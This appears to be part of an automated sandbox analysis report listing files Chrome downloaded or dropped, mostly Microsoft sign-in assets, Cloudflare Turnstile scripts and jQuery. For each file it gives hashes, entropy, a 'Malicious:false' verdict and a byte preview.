                                                                            Preview:<script type="text/javascript">!function(t,e){for(var s in e)t[s]=e[s]}(this,function(t){function e(n){if(s[n])return s[n].exports;var i=s[n]={exports:{},id:n,loaded:!1};return t[n].call(i.exports,i,i.exports,e),i.loaded=!0,i.exports}var s={};return e.m=t,e.c=s,e.p="",e(0)}([function(t,e){function s(t){for(var e=f[S],s=0,n=e.length;s<n;++s)if(e[s]===t)return!0;return!1}function n(t){if(!t)return null;for(var e=t+"=",s=document.cookie.split(";"),n=0,i=s.length;n<i;n++){var a=s[n].replace(/^\s*(\w+)\s*=\s*/,"$1=").replace(/(\s+$)/,"");if(0===a.indexOf(e))return a.substring(e.length)}return null}function i(t,e,s){if(t)for(var n=t.split(":"),i=null,a=0,r=n.length;a<r;++a){var c=null,S=n[a].split("$");if(0===a&&(i=parseInt(S.shift()),!i))return;var l=S.length;if(l>=1){var p=o(i,S[0]);if(!p||s[p])continue;c={signInName:p,idp:"msa",isSignedIn:!0}}if(l>=3&&(c.firstName=o(i,S[1]),c.lastName=o(i,S[2])),l>=4){var f=S[3],d=f.split("|");c.otherHashedAliases=d}if(l>=5){var h=parseInt(S[4],16);h&&(c.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                            Category:downloaded
                                                                            Size (bytes):61
                                                                            Entropy (8bit):3.990210155325004
                                                                            Encrypted:false
                                                                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                            Malicious:false
                                                                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                            Category:downloaded
                                                                            Size (bytes):122515
                                                                            Entropy (8bit):7.997419459076181
                                                                            Encrypted:true
                                                                            SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                            MD5:AC9A6ED508328361A4C9530325A94076
                                                                            SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                            SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                            SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/ConvergedLogin_PCore_kAx9qZOSH4g90FNHstHMCA2.js
                                                                            Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview:1
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1592
                                                                            Category:downloaded
                                                                            Size (bytes):621
                                                                            Entropy (8bit):7.673946009263606
                                                                            Encrypted:false
                                                                            SSDEEP:12:Xp7fmqfW/e4YC2L0E5DZLB62y/+6lbPa1Gotq8mdd2Xmy2QLBwxD+QkCfBJ:Xp6qf2SCk3LBpy/rtPa1GKq8mOX5jLcD
                                                                            MD5:4761405717E938D7E7400BB15715DB1E
                                                                            SHA1:76FED7C229D353A27DB3257F5927C1EAF0AB8DE9
                                                                            SHA-256:F7ED91A1DAB5BB2802A7A3B3890DF4777588CCBE04903260FBA83E6E64C90DDF
                                                                            SHA-512:E8DAC6F81EB4EBA2722E9F34DAF9B99548E5C40CCA93791FBEDA3DEBD8D6E401975FC1A75986C0E7262AFA1B9D1475E1008A89B92C8A7BEC84D8A917F221B4A2
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg
                                                                            Preview:..........}UMo"1..+.....G; .8l...M..$.U.AW......UaX..`'.=......|..z3...Ms>..Y...QB..W..y..6.......?..........L.W=m....=..w.)...nw...a.z......#.y.j...m...P...#...6....6.u.u...OF.V..07b..\...s.f..U..N..B...>.d.-z..x.2..Lr.Rr)....JF.z.;Lh.....q.2.A....[.&".S..:......]........#k.U#57V..k5.tdM.j.9.FMQ2..H:.~op..H.......hQ.#...r[.T.$.@........j.xc.x0..I.B:#{iP1.e'..S4.:...mN.4)<W.A.).g.+..PZ&.$.#.6v.+.!...x*...}.._...d...#.Cb..(..^k..h!..7.dx.WHB......(.6g.7.Wwt.I<.......o.;.....Oi$}f.6.....:P..!<5.(.p.e.%et.)w8LA.l9r..n.....?.F.DrK...H....0F...{.,.......{E.."....*...x.@..?u......../....8...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:downloaded
                                                                            Size (bytes):36
                                                                            Entropy (8bit):4.503258334775644
                                                                            Encrypted:false
                                                                            SSDEEP:3:Eq62iczBr9ks:EqdiczBys
                                                                            MD5:06B313E93DD76909460FBFC0CD98CB6B
                                                                            SHA1:C4F9B2BBD840A4328F85F54873C434336A193888
                                                                            SHA-256:B4532478707B495D0BB1C21C314AEF959DD1A5E0F66E52DAD5FC332C8B697CBA
                                                                            SHA-512:EFD7E8195D9C126883C71FED3EFEDE55916848B784F8434ED2677DF5004436F7EDE9F80277CB4675C4DEB8F243B2705A3806B412FAA8842E039E9DC467C11645
                                                                            Malicious:false
                                                                            URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xNDkSFwmCAmly1gHbXRIFDdFbUVISBQ1Xevf9?alt=proto
                                                                            Preview:ChgKDQ3RW1FSGgQIVhgCIAEKBw1Xevf9GgA=
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (47691)
                                                                            Category:downloaded
                                                                            Size (bytes):47692
                                                                            Entropy (8bit):5.4016459163756165
                                                                            Encrypted:false
                                                                            SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                            MD5:9046FDD8B20F930F537279DEDE41E747
                                                                            SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                            SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                            SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                            Malicious:false
                                                                            URL:https://challenges.cloudflare.com/turnstile/v0/b/787bc399e22f/api.js
                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 450755
                                                                            Category:dropped
                                                                            Size (bytes):122515
                                                                            Entropy (8bit):7.997419459076181
                                                                            Encrypted:true
                                                                            SSDEEP:3072:1L4xVJNv/cJPu5OEjvuUQIq40zDH227PURbj:1kbGugELatzL7PUlj
                                                                            MD5:AC9A6ED508328361A4C9530325A94076
                                                                            SHA1:ADC81FAE51EB66A220539EEEDECEB96CFF390BBB
                                                                            SHA-256:BA93F4A83BB77D32AF9AFB9B014BFD13FD497E3D8F15AF016C782ABD1D34037B
                                                                            SHA-512:066D92389A7EFB3A80FCFC86696EE6AE008259570F73814303A9ACC1690F881DF2034A16D5C7970BA703648CA79C2E7CBAA2CAD98C28879ADD44AB06620305B4
                                                                            Malicious:false
                                                                            Preview:...........}[.8......\&.L..{.x.t.nv.p......ql%xH...rB....J.-'..=...}...&.Jo.R..T*}.y..*.\....J....uipR..|zuT....(]..O..._.6.......?e%.;rb...F%?p.h.FN......|gZ.G.<..<..dn...~.@.....2T.y.K'J^K...*..6...P.....!).a.....6.. f.E......s..8.'......F.....KN.J1KJ.0J.x?..!B.Zcj....8t.....1......!vq..Ac.0..V.N..a..}(%a.5\..g..I..6...L...x.7.......8..B..J....^b/s.....I...r..L.3.... ..y...^K.l.....%.'.|.8.T.....$.R..8.j.?.R.f..}..o.....$....a.'..Q..g..p1.:1t.}..y..}8...3...8....b.=(..3..d[.*.Os......%....Z...G.......x...2.,..RP..+..O. _....n.;=.?.....w../au.I.p...U|;......WM.f?...9.>8..9.....S../;._..un...].:_..e..V*:.....@..[.*.Ue.'Pe..&wv..T..ow.........?..\)WVb..r.;.....A........mpW.X.........B.....I...}j.....(...1.e.D.~.....;F..:..P.=.....(r^........N1.F....@..W%y.....t...Q....Y.5.$.O..x@.l.4.a.b*.f..3.2.B...DL}4Y.:.u........`?....W`Z".S.S..}= .:......i.@E"1T.....`\.a....J:].....R....=R..y...*......s<;....~NXr<%...|.v&...5..*....D.(9...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 142367
                                                                            Category:downloaded
                                                                            Size (bytes):49911
                                                                            Entropy (8bit):7.994516776763163
                                                                            Encrypted:true
                                                                            SSDEEP:1536:vr2T/J/l2R6ACJVMQPYmlBXTm12g9bcKo0y0ci:CzJ/lG2KQzBjm1b3ci
                                                                            MD5:9B96CC09F9E89D0334BA2FBC22B5197A
                                                                            SHA1:B5FE69F39E9F61FEF88DF794F02DC4F4086E2592
                                                                            SHA-256:E6331018533143C411BAE25326AB52FCED541C48674551AEA78E750855BDCD1D
                                                                            SHA-512:2BDD71A34A7D6172AD4B7B6CF077A891D6266C148000EEF8345E2343E6C21ED8783B2EA328EF3BF7176462A3CA575D2D6D4B55A07138CFD1B02900C95F61077D
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js
                                                                            Preview:...........m[.8.0........OL....;w.....a.....\N.......h.r~........=........,..JU.......T~.l..?..y..2.X9.|xvP9...TN.......?.....qe.OE.~Gn,.J.T....0......r..#.V&Qx_I.De.._.8.+S?N..HL..J......%O..S........(=.gO.|.T.0......6.. ..y....x..*..8..p.T"1...|$.Cz..V.D%.Ie.F....^."..5....c...?..T8..._..b.gs.4....S]kDZ..7.J.V..l}..?.....c...g.A...8.......8.VB..*....^..f..O.*... ...`...H.{.$. OP..S..AC.gVE.I8..).-U.....R...A..%.T[...Fc{..49..If...y.'w.Q}..oz..v.....W...pp..%..G.+.r:.A.*.....[.:..s.?U......_............k.y0.U....+I5..0.>.Q%.".w.....O....5w..;.;.>..mr.k53r.......k.0.I.<.D......d&...c..jhE..zx.]....y|W....i...`.. .k.P...@.Uq.\;..1............z|.O..Y5..........XtR,....R...k3..<.*.\.2.>.;T..$...kj.5-.i?/..YH`!jb..Z..=.&.L..F...([..y....K5pzQ.>i.1.......0..P...@...L.".n.x..Cj?..w.:+...n..4..H.. .*....S.....h*....8....v.l.[M.0..q..c;.....0*..*.8.......l.TM..n "..km..S.<.T..].k.+1.....P.V...4-W.C....0-/.S;.w......K.z+...DZ....=q.E.@ .Dv.z...@.d.#tE...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 15755
                                                                            Category:downloaded
                                                                            Size (bytes):5525
                                                                            Entropy (8bit):7.961202222662501
                                                                            Encrypted:false
                                                                            SSDEEP:96:dySl6/e7OAQD3cS66g8cxO4qXgy66F0+fgENU28TjN3KY6meSsj0ktMvB4YJix2I:dNl6/zFDW6dlXV665ReB67j0sEBWxl
                                                                            MD5:28CE5BF8BACB96D1C2CFA0092145C6EE
                                                                            SHA1:303A4629C4467AF2C551EC9E6353464C8C25827D
                                                                            SHA-256:6B89EEC14865DB53FE20FB3C70B0853362E21669DACE19C06172F673B2EDC5CD
                                                                            SHA-512:6A10794F105EF5C6F7F7DC2C89152A8342E6D9D8D9490783863ED2737FFD5982E916F72E0A9ECB944AB9815FA70BD20C7256A91E2A62D971F80C23822B809A02
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_1cd84c14a6b01fcd8515.js
                                                                            Preview:...........[}w.F....Bh..i3.M.t.rU.....]..M...@.(..........@..N..I-k..;w.....U.F..v....N....]....MC......U.]o>..mJ.w..~.5<......Z.h~8..8J..m......0.&Z:.Z.D_. .Z.....<.f..t..].I:..........b. ...}.ja......'..x......m6..c...$..........b|s......O.a..cE..u.2.*.6jG!.A.....P..?q@?"..).Mk.0.[."V..M..4...4.~}.?.i..D.}h|..$x.Ajm.S..H..-.x.If..]..1.D0.F......pq.(.|...y\...5....y2.q.Fq...[.|..n.b.i_D......xuR......I.TS.4..}|<...o....MG.+@.......\.?."...+[...A..&...{]......u..+p?......|...j....7...=H..cwp.38.;%c.....O..............p...X.g!....r...d..5.%x.....;...j6p...p......c.Nd.:...&.*....%.. tR.d.@.. ...1..6....i....:...s=..V...iN..1../tH..p<..Mo.......`&.7uA;..(lC.......4...?..0..[S@...D..|....=.wh2...<.. ...)..F...!. .C...k...S.pPt......s..K.V...w......7....Zn.d..t]l.........5=.(..#.....l._.Ip......-O.6.,......q4....!XS`6k..k.....9k....{~*.....X....q......l.>x..={j.n..W......e..Q..I/..;a..MS>.!5v.d.B+.o.....q...j.q..Z..=..@g.1q..,yBV91m.j>..4.o...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (65447)
                                                                            Category:downloaded
                                                                            Size (bytes):89501
                                                                            Entropy (8bit):5.289893677458563
                                                                            Encrypted:false
                                                                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                            Malicious:false
                                                                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                            Category:dropped
                                                                            Size (bytes):3620
                                                                            Entropy (8bit):6.867828878374734
                                                                            Encrypted:false
                                                                            SSDEEP:48:ZumKaT5ezv47j2/ZiRDlq16x8XvEUcg777shHdpHVGJqFd:Eal647jPDlL8XvEUcg77kVGyd
                                                                            MD5:B540A8E518037192E32C4FE58BF2DBAB
                                                                            SHA1:3047C1DB97B86F6981E0AD2F96AF40CDF43511AF
                                                                            SHA-256:8737D721808655F37B333F08A90185699E7E8B9BDAAA15CDB63C8448B426F95D
                                                                            SHA-512:E3612D9E6809EC192F6E2D035290B730871C269A267115E4A5515CADB7E6E14E3DD4290A35ABAA8D14CF1FA3924DC76E11926AC341E0F6F372E9FC5434B546E5
                                                                            Malicious:false
                                                                            Preview:GIF89a`.........iii!.......!.&Edited with ezgif.com online GIF maker.!..NETSCAPE2.0.....,....`.....6......P.l.......H....I..:qJ......k....`BY..L*..&...!.......,....`.....9..i....Q4......H..j.=.k9-5_..........j7..({.........!.......,....`.....9.......trV.......H....`.[.q6......>.. .CZ.&!.....M...!.......,....`.....8..........:......H..jJ..U..6_....../.el...q.)...*..!.......,....`.....9.....i..l.go.....H..*".U...f......._......5......n..!.......,....`.....:..i......./.....H...5%.kE/5.........In.a..@&3.....J...!.......,....`.....9.......kr.j.....H..*.-.{Im5c..............@&.........!.......,....`.....9.........j..q....H...].&..\.5.........8..S..........!.......,....`.....9.......3q.g..5....H...:u..............Al..x.q.........!.......,....`.....9......\.F....z....H...zX...ov.........h3N.x4......j..!.......,....`.....9........Q.:......H....y..^...1.........n.!.F......E...!.......,....`.....8.........i,......H....*_.21.I.........%...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
                                                                            Category:downloaded
                                                                            Size (bytes):17174
                                                                            Entropy (8bit):2.9129715116732746
                                                                            Encrypted:false
                                                                            SSDEEP:24:QSNTmTFxg4lyyyyyyyyyyyyyio7eeeeeeeeekzgsLsLsLsLsLsQZp:nfgyyyyyyyyyyyyynzQQQQQO
                                                                            MD5:12E3DAC858061D088023B2BD48E2FA96
                                                                            SHA1:E08CE1A144ECEAE0C3C2EA7A9D6FBC5658F24CE5
                                                                            SHA-256:90CDAF487716184E4034000935C605D1633926D348116D198F355A98B8C6CD21
                                                                            SHA-512:C5030C55A855E7A9E20E22F4C70BF1E0F3C558A9B7D501CFAB6992AC2656AE5E41B050CCAC541EFA55F9603E0D349B247EB4912EE169D44044271789C719CD01
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico
                                                                            Preview:..............h(..f...HH...........(..00......h....6.. ...........=...............@..........(....A..(....................(....................................."P.........................................."""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333"""""""""""""""""""""""""""""" ...333333333333333333333333333333""""""""""""""""""""""""""
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:ASCII text, with very long lines (47691)
                                                                            Category:dropped
                                                                            Size (bytes):47692
                                                                            Entropy (8bit):5.4016459163756165
                                                                            Encrypted:false
                                                                            SSDEEP:768:IXCtQmIutwVHuzZBF6gmXLSOzQDjdxdOQbk6sgEvk/7b39tobLKZUanw81KZLGcD:IGJWHuzZBF6xbGfLsVvy33FUaDW
                                                                            MD5:9046FDD8B20F930F537279DEDE41E747
                                                                            SHA1:EBB905F60D71F45D056D42E6096736EA8C2D4BD9
                                                                            SHA-256:5AAC9E52F80011983676C03AD8120E0369E651E6357D0B05054026A3BC8EC32D
                                                                            SHA-512:F289C718B32D9E75E5725116D7696070C840426310B2A75E3EE66933E50B85BF738B4015FCFB8BAF7A8545B600B9820D85F8BB41C055FB0877C1420655E5E975
                                                                            Malicious:false
                                                                            Preview:"use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Ht(u,o,c,g,h,"next",l)}function h(l){Ht(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 57510
                                                                            Category:dropped
                                                                            Size (bytes):16345
                                                                            Entropy (8bit):7.98960525258912
                                                                            Encrypted:false
                                                                            SSDEEP:384:hOBEj/gTOkWow6mhJqXnYI/0PiQBSoe122Yw/:hOBKJBXO586QB+11J
                                                                            MD5:187B9EBA41FDF66B2C8F7EB645D2BC17
                                                                            SHA1:B1C034F7F5F754F271D094FB417B9A820C1F712C
                                                                            SHA-256:CA0FBF8421A0CF4CCDA7310B2AE74CBD92214901EC2D0F273EA3B07F12CF96EA
                                                                            SHA-512:0D7FB682D24E97C9E3FC04AA87CCB8EC508CA0CF197DA0617EFFD981BC8B5E3600824FDD08F1F31F59D276B5BF53229D00805D984E01D512FD968610C5FE9609
                                                                            Malicious:false
                                                                            Preview:...........}Ms#.......\.@..'F.........3RH2....~......Q.x7...}..'.}..?e#...QU]....Vo..................?........w!......=.G...P.../......8z....q._5....g..}g..31......l*...],.b..;..`...Y....3..5.uGAi..NP.6<.w.(..`...y..d.N.x..^u.....^...?..N........Fq.....z..wgN./..Ep/f..c/.D4~X.W~).s/.E8...T...8,:..Q.p>.....7.....4....Z,&c.)n.[.pcQp...4...&...i.............CkL=.....g..m&vG..p... ....:N`y...ea.,....[......^.../D#(y.....l4.n..,.=_.p2P.....A,..RP..E.T......8 .v....Iw.X..?.r......nk....?Wj..a.|..........JAs.j......?.)..t.z.-..m.]..3y...3@...'.)...Aa..1.kQ.....l+.....-q..n.p..{^...$..{/...=a..A...4.VH}..SBwju......S..hN.P..-..O,..S7.J,.....p.iLU.6W.....eO.7 ..C...{.E.Z...1...5s.!uY...@^. ,D".N.E......5.NE..\...VQa.A7..X.B..{.q..Ra..S....x(x7.Cp.#.#..:.......D..`,!IGr.. ...z.?.._0O.......;..0.z.h....5.../...q..5.|..B.OY..k...].Sw.>.".@..!.9.V|...=.dv.3!sr.....#...X8s.w.|7..O/....!.."...3.."D..)...[........!^....3(..{...F2'..q.....x........
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:gzip compressed data, max speed, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1864
                                                                            Category:downloaded
                                                                            Size (bytes):673
                                                                            Entropy (8bit):7.6596900876595075
                                                                            Encrypted:false
                                                                            SSDEEP:12:Xl0t8TUViiYi5m6FhSBXWPsigK99WCqKMvBBFThSqfLd81CK6bC+k7LqZLsFlD:XFUVpkNK0Rwid81p6btk7LqZ6D
                                                                            MD5:0E176276362B94279A4492511BFCBD98
                                                                            SHA1:389FE6B51F62254BB98939896B8C89EBEFFE2A02
                                                                            SHA-256:9A2C174AE45CAC057822844211156A5ED293E65C5F69E1D211A7206472C5C80C
                                                                            SHA-512:8D61C9E464C8F3C77BF1729E32F92BBB1B426A19907E418862EFE117DBD1F0A26FCC3A6FE1D1B22B836853D43C964F6B6D25E414649767FBEA7FE10D2048D7A1
                                                                            Malicious:false
                                                                            URL:https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg
                                                                            Preview:...........U.n.0....}i..P..C..7l/..d........n...G....yl. .E.......Tu.F.........?$.i.s..s...C..wi$.....r....CT.U.FuS..r.e.~...G.q...*..~M..mu}.0.=..&.~.e.WLX.....X..%p..i......7+.........?......WN..%>...$..c..}N....Y4?..x.1.....*.#v...Gal9.!.9.A.u..b..>..".#A2"+...<qc.v....)3...x.p&..K.&..T.r.'....J.T....Q..=..H).X...<.r...KkX........)5i4.+.h.....5.<..5.^O.eC%V^....Nx.E..;..52..h....C"I./.`..O...f..r..n.h.r]}.G^..D.7..i.].}.G.].....{....oW............h.4...}~=6u..k...=.X..+z}.4.].....YS5..J......)......m....w.......~}.C.b_..[.u..9_7.u.u.....y.ss....:_yQ<{..K.V_Z....c.G.N.a...?/..%. .-..K.td....4...5.(.e.`G7..]t?.3..\..... ....G.H...
                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            File Type:GIF image data, version 89a, 352 x 3
                                                                            Category:dropped
                                                                            Size (bytes):2672
                                                                            Entropy (8bit):6.640973516071413
                                                                            Encrypted:false
                                                                            SSDEEP:48:ZaOdwduTYPpS9pZy9vDNi1miicsvrJkafMiS+MGQ09DU/X9/4Xp6m5Z9SQcq:4CIuTYPpSTc9vcPZX9/2gzQ/
                                                                            MD5:166DE53471265253AB3A456DEFE6DA23
                                                                            SHA1:17C6DF4D7CCF1FA2C9EFD716FBAE0FC2C71C8D6D
                                                                            SHA-256:A46201581A7C7C667FD42787CD1E9ADF2F6BF809EFB7596E61A03E8DBA9ADA13
                                                                            SHA-512:80978C1D262BC225A8BA1758DF546E27B5BE8D84CBCF7E6044910E5E05E04AFFEFEC3C0DA0818145EB8A917E1A8D90F4BAC833B64A1F6DE97AD3D5FC80A02308
                                                                            Malicious:false
